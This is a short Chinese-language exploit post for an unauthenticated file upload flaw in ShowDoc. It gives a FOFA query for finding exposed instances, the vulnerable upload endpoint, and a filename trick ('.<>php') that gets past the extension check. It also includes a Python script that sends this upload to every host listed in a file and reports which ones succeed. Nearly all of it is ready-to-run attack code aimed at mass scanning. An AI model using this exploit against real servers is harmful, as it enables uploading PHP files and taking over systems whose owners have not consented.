ShowDoc 前台文件上传漏洞

# ShowDoc 前台文件上传漏洞

FOFA:

“`
app=”ShowDoc”
“`

**PoC：**

“`
POST /server/index.php?s=/home/page/uploading HTTP/1.1
上传图片，并抓包，将文件名改为plzmyy.<>php
“`

“`py
import requests
requests.packages.urllib3.disable_warnings()

test = open(‘url.txt’,”r”)
for host in test.readlines():
url = host+”/server/index.php?s=/home/page/uploading”
payload = “””——WebKitFormBoundary5j2IsrTFPjJCVtwU
Content – Disposition: form – data;name = “editormd-image-file”;filename = “plzmyy.<>php”
Content – Type: text / plain

123123test
——WebKitFormBoundary5j2IsrTFPjJCVtwU – -“””
headers = {
“Cookie”: “PHPSESSID=shp3gipo9moaj58kp9n8sbi4f1; think_language=zh-CN; cookie_token=8ff04b9bba8b6abf30ab5e0be6cceea2192c9cf7a90d73b2d34d025d84feea2d”,
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9”,
“Connection”: “close”,
“User-Agent”: “Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36”,
“Sec-Fetch-Site”: “same-origin”,
“Sec-Fetch-Dest”: “iframe”,
“Accept-Encoding”: “gzip, deflate”,
“Sec-Fetch-Mode”: “navigate”,
“sec-ch-ua”: “\”Google Chrome\”;v=\”87\”, \” Not;A Brand\”;v=\”99\”, \”Chromium\”;v=\”87\””,
“sec-ch-ua-mobile”: “?0”,
“Cache-Control”: “max-age=0”,
“Upgrade-Insecure-Requests”: “1”,
“Accept-Language”: “zh-CN,zh;q=0.9,en;q=0.8”,
“Content-Length”: “212”,
“Content-Type”: “multipart/form-data; boundary=—-WebKitFormBoundary5j2IsrTFPjJCVtwU”
}
try:
response = requests.request(“POST”, url, data=payload, headers=headers, verify=False, timeout=5)
except:
continue

if response.text in ‘success’:
print(response.text)
“`

ref：

* https://github.com/star7th/showdoc/pull/1059
* https://forum.ywhack.com/thread-114961-1-1.html